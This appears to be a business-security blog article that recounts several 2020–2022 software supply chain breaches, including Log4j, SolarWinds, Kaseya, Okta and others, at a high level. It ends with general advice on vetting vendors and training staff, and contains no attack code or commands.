Remember when Bill Nighy famously sang in Love Actually that “Christmas is all around us“?
If Nighy were singing that song today – and if he were playing a cybersecurity expert rather than a washed-up pop artist – the lyrics might instead go, “Supply chain attacks are all around us.”
Supply chain cyber-attacks remain a severe and persistent challenge for businesses across the planet.
They pose a tremendous and longer-term threat – partly because many businesses remain so poorly prepared to detect this type of cyber risk, let alone manage it, and partly because software supply chain attacks keep occurring despite dogged efforts to stop them.
To prove the point, here’s a look at four of the most significant software supply chain breaches that have taken place over the past year. Some have received widespread coverage in the media, while others have remained out of the spotlight except within cybersecurity circles. But they all underline just how pervasive supply chain risks have become for businesses of all types and sizes.
The Log4j supply chain fiasco
The vulnerability, which was disclosed in November 2021, affects an open-source logging utility called Log4j, which is widely used as part of Java-based software stacks – so widely that it threatens “millions” of applications across the Internet, at companies ranging from tech titans like Google and Microsoft, to humble SMBs, and everyone in between.
The vulnerability enables attackers to gain remote access to applications that use Log4j. From there, attackers can also breach the underlying servers and network – which means the Log4j hack is essentially a wide-open door to businesses’ entire IT estates. This makes Log4j a worst-case scenario when it comes to supply chain risks. To get a better idea of the pandemic type spread and the devastation it caused, attacks were discovered on the 9th of December, and by the 11th of December 40, 000 attacks were reported. This increased to 800,000 attacks within 72hours of i’s discovery. Attackers tried to exploit 48% of global corporate networks, showing staggering numbers and the power these hackers have.
It’s hard to put a specific dollar figure on the Log4j vulnerability, mainly because it was recently disclosed. It remains to be seen how quickly affected systems will be patched. But given the severity of the vulnerability and the vast number of businesses it impacts, it’s not unreasonable to imagine that enterprises that fail to address the vulnerability quickly could collectively face billions of dollars in losses due to sensitive data exposure, operational disruptions, and compliance violations.
The SolarWinds breach
Probably the second most famous supply chain breach in recent history targeted customers of SolarWinds, whose network monitoring software was hacked. By inserting malicious code into the source code of the SolarWinds platform, attackers were able to build themselves a backdoor into the private networks of at least 18,000 government agencies and private companies.
The attack has already cost SolarWinds itself $18 million. It’s unclear what financial losses look like for businesses impacted by the breach. Still, as with Log4j, the economic fallout could be steep for organizations that suffer data leakage and IT disruptions by failing to address the risk quickly.
What’s especially noteworthy about the SolarWinds breach (beyond the high-profile targets it compromised) is that the attack reportedly began in early 2019 but wasn’t disclosed publicly until December 2020. It’s an example of a supply chain attack wherein hackers had access to a private environment for well over a year before any victims even knew it was happening.
The Kaseya supply chain breach
A similar supply chain crisis befell users of Kaseya, an IT management platform used by thousands of Managed Service Providers (MSPs) and other businesses in the IT industry.
In the Kaseya attack, threat actors manipulated Kaseya’s software to allow them to deploy REvil ransomware into IT environments that are managed using the Kaseya platform. As a result, this hack of a single platform reportedly placed more than 1,500 companies at risk.
That’s a small figure compared to some of the other major supply chain breaches of the past year. But it’s still stunning when you realize that the violation of a single software platform gave attackers access to the networks and data of well over a thousand organizations.
The Panasonic breach leaks customer data.
Panasonic disclosed in November 2021 that one of its file servers had been compromised. The breach was active for months before being discovered.
Although Panasonic was initially tight-lipped about which data attackers were able to access, subsequent reports assert that customer information was leaked. It remains unclear exactly how many customers were impacted or what their actual financial losses might be; what we do know, however, is that by breaching a single server at a primary vendor, attackers were able to compromise sensitive information associated with a large number of businesses.
In that sense, the Panasonic breach represents a unique supply chain attack: One that compromises data that businesses share as part of supply chain operations. It’s a reminder that it’s not just your software vendors who can create security risks within your supply chain but also any businesses with whom you share sensitive internal data.
The GoDaddy breach of 2021
In a similar incident, GoDaddy, the widely used hosting company, announced in November 2021 that a data breach had led to the exposure of data involving 1.2 million customers.
Especially notable about this incident is that it wasn’t just recorded like customer names and addresses that were leaked. SSH keys and database login information were also reportedly exposed, giving attackers the ability to access millions of systems hosted on the GoDaddy platform.
In that respect, this data breach was just as bad as a software breach like the SolarWinds or Log4j vulnerabilities, which gave attackers remote access to the environments of companies that use those platforms.
The Accellion breach
Accellion is well known for secure file sharing and collaboration software. In December 2020, Accellion’s file transfer application suffered a zero-day exploit. Shortly after, they provided a patch for the vulnerability; This was not enough, and during the following month’s threat, actors successfully targeted Accellion again. New vulnerabilities were revealed, and threat actors combined multiple zero-day exploits and a new web shell targeting. Following this, another patch was released.
The security breach had devastating consequences affecting 300 customers worldwide. There are claims that the cyber group UNC2546 is likely responsible for the chaos as they sent emails to people threatening to publish their data.
You are sure to know these organizations caught in the ripple effect, such as Shell Oil Company, the University of California system, the Australian Securities and Investments Commission, and the Reserve Bank of New Zealand.
Sadly, the breach impacted millions of individuals’ sensitive data by stealing ID numbers, credit card information, and banking details.
The class-action lawsuit filed by the plaintiffs’ stated that Accellion failed to secure their FTA platform and implement sufficient security for their customers’ sensitive information.
According to a Reuters report, Accellion has paid $81million in settlements for the data breach.
The HP printer vulnerability
You may not think of your printer as a significant cybersecurity risk. But if you own one of the more than 200 HP printer models affected by a major vulnerability, it’s time to think again.
The vulnerability enables a buffer overflow attack, which hackers can use to execute their chosen code from a remote location. Although the code would run on a printer rather than a computer or server, most printers are connected to local networks. This vulnerability could serve as a beachhead, which attackers can use to launch attacks against other devices on the web.
There are no reports of significant attacks that exploit the HP printer vulnerability. Still, it’s not hard to imagine hackers using this flaw to launch major ransomware attacks against businesses that use HP printers.
The Nvidia hack
Nvidia, the primary manufacturer of GPUs (Graphics processing units), was one of the highest-profile companies to suffer a large-scale breach in 2022.
The attack, which a hacking group called Lapsus$ claims to have carried out, led to the leakage of 1 terabyte of sensitive data. Nvidia has not given a complete account of the lost data, but it included proprietary source code and employee login information. Lapsus$ hackers have already posted some of the stolen data online.
While it’s difficult to put a monetary figure on the cost of the attack without more details about exactly which data was lost, it’s safe to say that the financial impact was substantial. The breach harmed Nvidia’s reputation, but the exposure of sensitive source code could also help Nvidia’s competitors learn more about how some of its most profitable products work – which is not a good thing from a business perspective.
The Okta breach
Lapsus$ has also been busy this spring posting sensitive information it claims to have stolen from Okta, an authentication company used by thousands of organizations worldwide.
The attack happened not because hackers expertly exploited a vulnerability but because they gained physical access to an Okta employee’s laptop. (Lapsus$ later claimed that it breached a thin client instead of a computer. Either way, it’s clear that gaining access to a single employee’s device allowed the hackers unfettered access to a large portion of Okta’s infrastructure.)
Given that Okta is in the business of preventing unauthorized access to applications and infrastructure, this attack is a little ironic. It’s also a reminder of why companies should take measures – like enforcing two-factor authentication, to ensure that an attack against a single device can’t turn into a large-scale, supply chain cyber security threat.
Staying ahead of supply chain attacks
Incidents like those described above are reminders that supply chain attacks are all around us. If your business hasn’t been affected yet, you’re probably just lucky.
But the good news is that there are practical steps you can take to minimize your risk of suffering software supply chain breaches. Start with vetting your vendors and partners to adhere to solid cybersecurity standards. You may also consider enforcing compliance rules within your supply chain networks. Remember to educate your cybersecurity team in managing the particular risks associated with supply chain threats.